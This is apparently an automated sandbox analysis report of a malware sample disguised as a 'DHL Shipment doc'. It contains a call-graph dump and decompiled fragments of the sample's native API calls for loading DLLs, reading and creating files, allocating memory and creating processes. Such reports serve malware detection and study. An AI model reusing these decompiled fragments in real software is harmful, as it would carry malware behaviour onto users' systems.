15109->15110 15112 413761 15110->15112 15113 41374d 15111->15113 15217 41a2c0 15112->15217 15113->15070 15115 41376c 15115->15070 15117 41346b 15116->15117 15118 41349e 15116->15118 15119 418570 LdrLoadDll 15117->15119 15120 4135e9 15118->15120 15123 4134ba 15118->15123 15121 413486 15119->15121 15122 418570 LdrLoadDll 15120->15122 15124 418720 2 API calls 15121->15124 15128 413604 15122->15128 15125 418570 LdrLoadDll 15123->15125 15126 41348f 15124->15126 15127 4134d5 15125->15127 15126->15071 15130 4134f1 15127->15130 15131 4134dc 15127->15131 15129 4185b0 LdrLoadDll 15128->15129 15132 41363e 15129->15132 15134 4134f6 15130->15134 15138 41350c 15130->15138 15133 418720 2 API calls 15131->15133 15135 418720 2 API calls 15132->15135 15136 4134e5 15133->15136 15137 418720 2 API calls 15134->15137 15139 413649 15135->15139 15136->15071 15140 4134ff 15137->15140 15143 413511 15138->15143 15223 41a280 15138->15223 15139->15071 15140->15071 15152 413523 15143->15152 15227 4186a0 15143->15227 15144 413577 15145 41358e 15144->15145 15236 418530 15144->15236 15147 413595 15145->15147 15148 4135aa 15145->15148 15150 418720 2 API calls 15147->15150 15149 418720 2 API calls 15148->15149 15151 4135b3 15149->15151 15150->15152 15153 4135df 15151->15153 15231 419e80 15151->15231 15152->15071 15153->15071 15155 4135ca 15156 41a0b0 2 API calls 15155->15156 15157 4135d3 15156->15157 15157->15071 15159 4191f0 LdrLoadDll 15158->15159 15160 41870c 15159->15160 15160->15044 15239 418250 15161->15239 15164 4136a4 15166 418720 2 API calls 15164->15166 15165 4136b8 15242 4182a0 15165->15242 15168 4136ad 15166->15168 15168->15066 15170 418720 2 API calls 15171 4136e2 15170->15171 15172 418720 2 API calls 15171->15172 15173 4136ec 15172->15173 15173->15066 15175 413d24 15174->15175 15176 4191f0 LdrLoadDll 15174->15176 15177 4185b0 15175->15177 15176->15175 15178 413d3c 15177->15178 15179 4191f0 LdrLoadDll 15177->15179 15180 418720 15178->15180 15179->15178 15181 4191f0 LdrLoadDll 15180->15181 15182 41873c NtClose 15181->15182 15182->15073 15184 4137de 15183->15184 15185 418570 LdrLoadDll 15183->15185 15186 4137e7 15184->15186 15187 4137fc 15184->15187 15185->15184 15188 418720 2 API calls 15186->15188 15189 413820 15187->15189 15190 41386a 15187->15190 15203 4137f0 15188->15203 15245 418650 15189->15245 15192 4138b0 15190->15192 15193 41386f 15190->15193 15194 4139ea 15192->15194 15196 4138c2 15192->15196 15198 4186a0 2 API calls 15193->15198 15193->15203 15194->15203 15206 4186a0 2 API calls 15194->15206 15199 4138c7 15196->15199 15207 413902 15196->15207 15197 418720 2 API calls 15197->15203 15200 41389a 15198->15200 15202 418650 LdrLoadDll 15199->15202 15201 418720 2 API calls 15200->15201 15204 4138a3 15201->15204 15205 4138ea 15202->15205 15203->15053 15204->15053 15208 418720 2 API calls 15205->15208 15209 413a41 15206->15209 15207->15203 15211 418650 LdrLoadDll 15207->15211 15210 4138f3 15208->15210 15212 418720 2 API calls 15209->15212 15210->15053 15213 41392a 15211->15213 15215 413a4a 15212->15215 15214 418720 2 API calls 15213->15214 15216 413935 15214->15216 15215->15053 15216->15053 15220 4188c0 15217->15220 15219 41a2da 15219->15115 15221 4191f0 LdrLoadDll 15220->15221 15222 4188dc RtlAllocateHeap 15221->15222 15222->15219 15224 41a281 15223->15224 15225 4188c0 2 API calls 15224->15225 15226 41a298 15224->15226 15225->15226 15226->15143 15228 4186a6 15227->15228 15229 4191f0 LdrLoadDll 15228->15229 15230 4186bc NtReadFile 15229->15230 15230->15144 15232 419ea4 15231->15232 15233 419e8d 15231->15233 15232->15155 15233->15232 15234 41a280 2 API calls 15233->15234 15235 419ebb 15234->15235 15235->15155 15237 4191f0 LdrLoadDll 15236->15237 15238 41854c 15237->15238 15238->15145 15240 4191f0 LdrLoadDll 15239->15240 15241 41369d 15240->15241 15241->15164 15241->15165 15243 4136d9 15242->15243 15244 4191f0 LdrLoadDll 15242->15244 15243->15170 15244->15243 15246 413845 15245->15246 15247 4191f0 LdrLoadDll 15245->15247 15246->15197 15247->15246 15249 41a05d 15248->15249 15372 4187d0 15248->15372 15249->15078 15252 413081 15251->15252 15253 413089 15251->15253 15252->15081 15275 41335c 15253->15275 15375 41b260 15253->15375 15255 4130dd 15256 41b260 2 API calls 15255->15256 15260 4130e8 15256->15260 15257 413136 15259 41b260 2 API calls 15257->15259 15262 41314a 15259->15262 15260->15257 15380 41b300 15260->15380 15261 41b260 2 API calls 15264 4131bd 15261->15264 15262->15261 15263 41b260 2 API calls 15265 413205 15263->15265 15264->15263 15386 41b2c0 15265->15386 15268 41b2c0 2 API calls 15269 41333e 15268->15269 15270 41b2c0 2 API calls 15269->15270 15271 413348 15270->15271 15272 41b2c0 2 API calls 15271->15272 15273 413352 15272->15273 15274 41b2c0 2 API calls 15273->15274 15274->15275 15275->15081 15277 4143b1 15276->15277 15278 413a60 6 API calls 15277->15278 15280 4143c7 15278->15280 15279 41441a 15279->15084 15280->15279 15281 414402 15280->15281 15282 414415 15280->15282 15283 41a0b0 2 API calls 15281->15283 15284 41a0b0 2 API calls 15282->15284 15285 414407 15283->15285 15284->15279 15285->15084 15389 418ec0 15286->15389 15288 419014 15289 418ec0 LdrLoadDll 15288->15289 15290 41901d 15289->15290 15291 418ec0 LdrLoadDll 15290->15291 15292 419026 15291->15292 15293 418ec0 LdrLoadDll 15292->15293 15294 41902f 15293->15294 15295 418ec0 LdrLoadDll 15294->15295 15296 419038 15295->15296 15297 418ec0 LdrLoadDll 15296->15297 15298 419041 15297->15298 15299 418ec0 LdrLoadDll 15298->15299 15300 41904d 15299->15300 15301 418ec0 LdrLoadDll 15300->15301 15302 419056 15301->15302 15303 418ec0 LdrLoadDll 15302->15303 15304 41905f 15303->15304 15305 418ec0 LdrLoadDll 15304->15305 15306 419068 15305->15306 15307 418ec0 LdrLoadDll 15306->15307 15308 419071 15307->15308 15309 418ec0 LdrLoadDll 15308->15309 15310 41907a 15309->15310 15311 418ec0 LdrLoadDll 15310->15311 15312 419086 15311->15312 15313 418ec0 LdrLoadDll 15312->15313 15314 41908f 15313->15314 15315 418ec0 LdrLoadDll 15314->15315 15316 419098 15315->15316 15317 418ec0 LdrLoadDll 15316->15317 15318 4190a1 15317->15318 15319 418ec0 LdrLoadDll 15318->15319 15320 4190aa 15319->15320 15321 418ec0 LdrLoadDll 15320->15321 15322 4190b3 15321->15322 15323 418ec0 LdrLoadDll 15322->15323 15324 4190bf 15323->15324 15325 418ec0 LdrLoadDll 15324->15325 15326 4190c8 15325->15326 15327 418ec0 LdrLoadDll 15326->15327 15328 4190d1 15327->15328 15329 418ec0 LdrLoadDll 15328->15329 15330 4190da 15329->15330 15331 418ec0 LdrLoadDll 15330->15331 15332 4190e3 15331->15332 15333 418ec0 LdrLoadDll 15332->15333 15334 4190ec 15333->15334 15335 418ec0 LdrLoadDll 15334->15335 15336 4190f8 15335->15336 15337 418ec0 LdrLoadDll 15336->15337 15338 419101 15337->15338 15339 418ec0 LdrLoadDll 15338->15339 15340 41910a 15339->15340 15341 418ec0 LdrLoadDll 15340->15341 15342 419113 15341->15342 15343 418ec0 LdrLoadDll 15342->15343 15344 41911c 15343->15344 15345 418ec0 LdrLoadDll 15344->15345 15346 419125 15345->15346 15347 418ec0 LdrLoadDll 15346->15347 15348 419131 15347->15348 15349 418ec0 LdrLoadDll 15348->15349 15350 41913a 15349->15350 15351 418ec0 LdrLoadDll 15350->15351 15352 419143 15351->15352 15353 418ec0 LdrLoadDll 15352->15353 15354 41914c 15353->15354 15355 418ec0 LdrLoadDll 15354->15355 15356 419155 15355->15356 15357 418ec0 LdrLoadDll 15356->15357 15358 41915e 15357->15358 15359 418ec0 LdrLoadDll 15358->15359 15360 41916a 15359->15360 15361 418ec0 LdrLoadDll 15360->15361 15362 419173 15361->15362 15363 418ec0 LdrLoadDll 15362->15363 15364 41917c 15363->15364 15364->15089 15366 4191f0 LdrLoadDll 15365->15366 15367 41816c 15366->15367 15367->14981 15369 419193 15368->15369 15395 418750 15369->15395 15373 4187ec NtAllocateVirtualMemory 15372->15373 15374 4191f0 LdrLoadDll 15372->15374 15373->15249 15374->15373 15376 41b270 15375->15376 15377 41b276 15375->15377 15376->15255 15378 41a280 2 API calls 15377->15378 15379 41b29c 15378->15379 15379->15255 15381 41b325 15380->15381 15383 41b35d 15380->15383 15382 41a280 2 API calls 15381->15382 15384 41b33a 15382->15384 15383->15260 15385 41a0b0 2 API calls 15384->15385 15385->15383 15387 41a0b0 2 API calls 15386->15387 15388 413334 15387->15388 15388->15268 15390 418edb 15389->15390 15391 413e60 LdrLoadDll 15390->15391 15392 418efb 15391->15392 15393 413e60 LdrLoadDll 15392->15393 15394 418fa7 15392->15394 15393->15394 15394->15288 15394->15394 15396 41876c 15395->15396 15397 4191f0 LdrLoadDll 15395->15397 15396->15086 15397->15396 15399 4191f0 LdrLoadDll 15398->15399 15400 41891c RtlFreeHeap 15399->15400 15400->15097 15402 406e40 15401->15402 15403 406e3b 15401->15403 15404 41a030 2 API calls 15402->15404 15403->14989 15411 406e65 15404->15411 15405 406ec8 15405->14989 15406 418150 LdrLoadDll 15406->15411 15407 406ece 15408 406ef4 15407->15408 15410 418850 LdrLoadDll 15407->15410 15408->14989 15412 406ee5 15410->15412 15411->15405 15411->15406 15411->15407 15413 41a030 2 API calls 15411->15413 15417 418850 15411->15417 15412->14989 15413->15411 15415 418850 LdrLoadDll 15414->15415 15416 40710e 15415->15416 15416->14946 15418 41886c 15417->15418 15419 4191f0 LdrLoadDll 15417->15419 15418->15411 15419->15418 15421 409d94 15420->15421 15424 417f20 15421->15424 15423 409dce 15423->14995 15425 417f3c 15424->15425 15426 4191f0 LdrLoadDll 15424->15426 15425->15423 15426->15425 15428 419853 15427->15428 15429 409b50 LdrLoadDll 15428->15429 15430 408a8b 15429->15430 15430->14954 15433 409ec3 15431->15433 15432 409f40 15432->14959 15433->15432 15434 417f20 LdrLoadDll 15433->15434 15434->15432 15436 4191f0 LdrLoadDll 15435->15436 15437 40cfbb 15436->15437 15437->14962 15438 418a60 15437->15438 15439 418a7f LookupPrivilegeValueW 15438->15439 15440 4191f0 LdrLoadDll 15438->15440 15439->14964 15440->15439 15442 4191f0 LdrLoadDll 15441->15442 15443 41850c 15442->15443 15443->14965 15445 40a047 15444->15445 15446 409ea0 LdrLoadDll 15445->15446 15447 40a076 15446->15447 15447->14889 15449 40d0aa 15448->15449 15457 40d160 15448->15457 15450 409ea0 LdrLoadDll 15449->15450 15451 40d0cc 15450->15451 15458 4181d0 15451->15458 15453 40d10e 15461 418210 15453->15461 15456 418720 2 API calls 15456->15457 15457->14892 15457->14893 15459 4181ec 15458->15459 15460 4191f0 LdrLoadDll 15458->15460 15459->15453 15460->15459 15462 4191f0 LdrLoadDll 15461->15462 15463 40d154 15462->15463 15463->15456 15465 409cb1 15464->15465 15466 409cad 15464->15466 15467 409cca 15465->15467 15468 409cfc 15465->15468 15466->14904 15499 417f60 15467->15499 15469 417f60 LdrLoadDll 15468->15469 15470 409d0d 15469->15470 15470->14904 15474 40d210 LdrLoadDll 15473->15474 15475 4133d6 15473->15475 15474->15475 15475->14906 15477 4079f9 15476->15477 15502 407720 15476->15502 15479 407720 8 API calls 15477->15479 15482 407a1d 15477->15482 15480 407a0a 15479->15480 15480->15482 15520 40d480 15480->15520 15482->14908 15484 4191f0 LdrLoadDll 15483->15484 15485 40a782 15484->15485 15486 40d210 15485->15486 15487 40d22d 15486->15487 15488 418250 LdrLoadDll 15487->15488 15489 40d26e 15488->15489 15490 40d275 15489->15490 15491 4182a0 LdrLoadDll 15489->15491 15490->14912 15492 40d29e 15491->15492 15492->14912 15494 4191f0 LdrLoadDll 15493->15494 15495 40a8b9 15494->15495 15495->14929 15497 4191f0 LdrLoadDll 15496->15497 15498 40a90c 15497->15498 15498->14933 15500 409cec 15499->15500 15501 4191f0 LdrLoadDll 15499->15501 15500->14904 15501->15500 15503 406e30 2 API calls 15502->15503 15518 40773a 15503->15518 15504 4079c9 15504->15477 15505 4079bf 15506 4070f0 LdrLoadDll 15505->15506 15506->15504 15509 418190 LdrLoadDll 15509->15518 15511 418720 LdrLoadDll NtClose 15511->15518 15514 40a920 LdrLoadDll NtClose 15514->15518 15517 4180b0 LdrLoadDll 15517->15518 15518->15504 15518->15505 15518->15509 15518->15511 15518->15514 15518->15517 15528 417fa0 15518->15528 15531 407550 15518->15531 15543 40d360 15518->15543 15551 418020 15518->15551 15554 418050 15518->15554 15557 4180e0 15518->15557 15560 407320 15518->15560 15576 405ea0 15518->15576 15521 40d4a5 15520->15521 15522 407130 6 API calls 15521->15522 15523 40d4c9 15522->15523 15524 40d4d6 15523->15524 15525 413a60 6 API calls 15523->15525 15527 41a0b0 2 API calls 15523->15527 15665 40d2c0 15523->15665 15524->15482 15525->15523 15527->15523 15529 4191f0 LdrLoadDll 15528->15529 15530 417fbc 15529->15530 15530->15518 15532 407566 15531->15532 15586 417b10 15532->15586 15534 40757f 15539 4076f1 15534->15539 15607 407130 15534->15607 15536 407665 15537 407320 7 API calls 15536->15537 15536->15539 15538 407693 15537->15538 15538->15539 15540 418190 LdrLoadDll 15538->15540 15539->15518 15541 4076c8 15540->15541 15541->15539 15542 418790 LdrLoadDll 15541->15542 15542->15539 15644 417fe0 15543->15644 15546 40d3c5 15546->15518 15549 40d3d1 15549->15518 15550 418720 2 API calls 15550->15546 15552 4191f0 LdrLoadDll 15551->15552 15553 41803c 15552->15553 15553->15518 15555 4191f0 LdrLoadDll 15554->15555 15556 41806c 15555->15556 15556->15518 15558 4191f0 LdrLoadDll 15557->15558 15559 4180fc 15558->15559 15559->15518 15561 407349 15560->15561 15650 407290 15561->15650 15564 418790 LdrLoadDll 15565 40735c 15564->15565 15565->15564 15566 4073e7 15565->15566 15568 4073e2 15565->15568 15658 40d3e0 15565->15658 15566->15518 15567 418720 2 API calls 15569 40741a 15567->15569 15568->15567 15569->15566 15570 417fa0 LdrLoadDll 15569->15570 15571 40747f 15570->15571 15571->15566 15572 417fe0 LdrLoadDll 15571->15572 15573 4074e3 15572->15573 15573->15566 15574 413a60 6 API calls 15573->15574 15575 407538 15574->15575 15575->15518 15577 405eea 15576->15577 15578 417fa0 LdrLoadDll 15577->15578 15579 405f04 15578->15579 15580 413e60 LdrLoadDll 15579->15580 15585 405fdc 15579->15585 15581 405f58 15580->15581 15582 409d70 LdrLoadDll 15581->15582 15583 405fb7 15582->15583 15584 413e60 LdrLoadDll 15583->15584 15584->15585 15585->15518 15587 41a280 2 API calls 15586->15587 15588 417b27 15587->15588 15614 408170 15588->15614 15590 417b42 15591 417b80 15590->15591 15592 417b69 15590->15592 15594 41a030 2 API calls 15591->15594 15593 41a0b0 2 API calls 15592->15593 15595 417b76 15593->15595 15596 417bba 15594->15596 15595->15534 15597 41a030 2 API calls 15596->15597 15598 417bd3 15597->15598 15604 417e74 15598->15604 15620 41a070 15598->15620 15601 417e60 15602 41a0b0 2 API calls 15601->15602 15603 417e6a 15602->15603 15603->15534 15605 41a0b0 2 API calls 15604->15605 15606 417ec9 15605->15606 15606->15534 15608 40722f 15607->15608 15609 407145 15607->15609 15608->15536 15609->15608 15610 413a60 6 API calls 15609->15610 15611 4071b2 15610->15611 15612 41a0b0 2 API calls 15611->15612 15613 4071d9 15611->15613 15612->15613 15613->15536 15615 408195 15614->15615 15616 409b50 LdrLoadDll 15615->15616 15617 4081c8 15616->15617 15619 4081ed 15617->15619 15623 40b350 15617->15623 15619->15590 15641 418810 15620->15641 15624 40b37c 15623->15624 15625 418470 LdrLoadDll 15624->15625 15626 40b395 15625->15626 15627 40b39c 15626->15627 15634 4184b0 15626->15634 15627->15619 15631 40b3d7 15632 418720 2 API calls 15631->15632 15633 40b3fa 15632->15633 15633->15619 15635 40b3bf 15634->15635 15636 4191f0 LdrLoadDll 15634->15636 15635->15627 15637 418aa0 15635->15637 15636->15635 15638 418aa1 15637->15638 15639 4191f0 LdrLoadDll 15638->15639 15640 418abf 15639->15640 15640->15631 15642 4191f0 LdrLoadDll 15641->15642 15643 417e59 15642->15643 15643->15601 15643->15604 15645 4191f0 LdrLoadDll 15644->15645 15646 40d3a4 15645->15646 15646->15546 15647 418080 15646->15647 15648 4191f0 LdrLoadDll 15647->15648 15649 40d3b5 15648->15649 15649->15549 15649->15550 15651 4072a8 15650->15651 15652 409b50 LdrLoadDll 15651->15652 15653 4072c3 15652->15653 15654 413e60 LdrLoadDll 15653->15654 15655 4072d3 15654->15655 15656 4072dc PostThreadMessageW 15655->15656 15657 4072f0 15655->15657 15656->15657 15657->15565 15659 40d3f3 15658->15659 15662 418120 15659->15662 15663 4191f0 LdrLoadDll 15662->15663 15664 40d41e 15663->15664 15664->15565 15666 40d2d1 15665->15666 15674 418970 15666->15674 15668 40d311 15669 40d318 15668->15669 15670 418190 LdrLoadDll 15668->15670 15669->15523 15671 40d32f 15670->15671 15671->15669 15672 418790 LdrLoadDll 15671->15672 15673 40d34e 15672->15673 15673->15523 15675 4191f0 LdrLoadDll 15674->15675 15676 41898f CreateProcessInternalW 15675->15676 15676->15668

                              Executed Functions

                              Function 00418642 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73filenativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              C-Code - Quality: 37%
                              			E00418642(void* __edi) {

				_pop(ss);
				asm("adc bl, [0x29bbc9f1]");
				_t1 = __edi + 0x5e;
				 *_t1 =  *((char*)(__edi + 0x5e)) - 1;
				asm("ficomp dword [ebp+0x1e]");
				if ( *_t1 < 0) goto L3;
			}



                              0x00418642
                              0x00418643
                              0x00418649
                              0x00418649
                              0x0041864c
                              0x0041864f

                              APIs
                              • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileRead
                              • String ID: *9A$A:A
                              • API String ID: 2738559852-3393056465
                              • Opcode ID: 4810ea6e2f94facf85988b5b29332e51c1bc3a2305cc6e82dcbacff4f6941baf
                              • Instruction ID: 8e57b21a112ab31d7c6b1d6ba0543481a0f6967f1ae2cad0eacb54953c2498bd
                              • Opcode Fuzzy Hash: 4810ea6e2f94facf85988b5b29332e51c1bc3a2305cc6e82dcbacff4f6941baf
                              • Instruction Fuzzy Hash: FF21E0B2204109ABDB18DF99DC94EEB77A9AF8C354F158249FA0DA7241C634E851CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041869A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38filenativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 11 41869a-4186e9 call 4191f0 NtReadFile
                              APIs
                              • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileRead
                              • String ID: A:A
                              • API String ID: 2738559852-2859176346
                              • Opcode ID: 40b671ccacba2d23a778ba0ee767292e06d283ac9816c1099dbc126ef6d10228
                              • Instruction ID: 1628b4857647c982ed4431088c360b56197b574895956c7edaea39bee45bd8c3
                              • Opcode Fuzzy Hash: 40b671ccacba2d23a778ba0ee767292e06d283ac9816c1099dbc126ef6d10228
                              • Instruction Fuzzy Hash: 6AF0F4B2200108ABCB14DF99DC80EEB77ADAF8C354F058249FE1D97241C630E851CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004186A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 16 4186a0-4186e9 call 4191f0 NtReadFile
                              C-Code - Quality: 37%
                              			E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
				intOrPtr _t13;
				void* _t18;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t13 = _a4;
				_t29 = _t13 + 0xc48;
				E004191F0(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a41
				_t18 =  *((intOrPtr*)( *_t29))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4, _t28); // executed
				return _t18;
			}








                              0x004186a3
                              0x004186af
                              0x004186b7
                              0x004186bc
                              0x004186e5
                              0x004186e9

                              APIs
                              • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileRead
                              • String ID: A:A
                              • API String ID: 2738559852-2859176346
                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                              • Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                              • Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00409B50 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 233 409b50-409b6c 234 409b74-409b79 233->234 235 409b6f call 41af80 233->235 236 409b7b-409b7e 234->236 237 409b7f-409b8d call 41b3a0 234->237 235->234 240 409b9d-409bae call 419730 237->240 241 409b8f-409b9a call 41b620 237->241 246 409bb0-409bc4 LdrLoadDll 240->246 247 409bc7-409bca 240->247 241->240 246->247
                              C-Code - Quality: 100%
                              			E00409B50(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E0041AF80( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B3A0(_v8, _t24, __eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B620( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419730(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                              0x00409b59
                              0x00409b6c
                              0x00409b6f
                              0x00409b74
                              0x00409b79
                              0x00409b83
                              0x00409b88
                              0x00409b8b
                              0x00409b8d
                              0x00409b95
                              0x00409b9a
                              0x00409b9a
                              0x00409ba1
                              0x00409ba9
                              0x00409bac
                              0x00409bae
                              0x00409bc2
                              0x00000000
                              0x00409bc4
                              0x00409bca
                              0x00409b7e
                              0x00409b7e
                              0x00409b7e

                              APIs
                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: Load
                              • String ID:
                              • API String ID: 2234796835-0
                              • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                              • Instruction ID: 5a8ad600e2bb26a3f9256955bcf7627a7477e6013f8e9ac5f1feb4612366a355
                              • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                              • Instruction Fuzzy Hash: 3A0152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004185EA Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 248 4185ea-418641 call 4191f0 NtCreateFile
                              C-Code - Quality: 82%
                              			E004185EA(void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				intOrPtr _v117;
				long _t23;
				void* _t34;

				asm("adc eax, 0x58aa322c");
				_v117 = _v117 + __edx;
				_t17 = _a4;
				_t5 = _t17 + 0xc40; // 0xc40
				E004191F0(_t34, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}






                              0x004185ea
                              0x004185ef
                              0x004185f3
                              0x004185ff
                              0x00418607
                              0x0041863d
                              0x00418641

                              APIs
                              • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 317a2c0b203aebd36da3fa286c0a94b2c6ad7ddb797753bcf1bbf841c9892b18
                              • Instruction ID: 4f0e49c2477b0657c67c2fec6e7e8f619a0fbfa7b88b330f09787f3110a3306a
                              • Opcode Fuzzy Hash: 317a2c0b203aebd36da3fa286c0a94b2c6ad7ddb797753bcf1bbf841c9892b18
                              • Instruction Fuzzy Hash: EF01AFB2610208BFCB48CF98DC95EEB77A9AF8C754F158249FA0DD7241D630E855CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004185F0 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 251 4185f0-418606 252 41860c-418641 NtCreateFile 251->252 253 418607 call 4191f0 251->253 253->252
                              C-Code - Quality: 100%
                              			E004185F0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191F0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                              0x004185ff
                              0x00418607
                              0x0041863d
                              0x00418641

                              APIs
                              • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                              • Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                              • Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004187CB Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 254 4187cb-41880d call 4191f0 NtAllocateVirtualMemory
                              C-Code - Quality: 82%
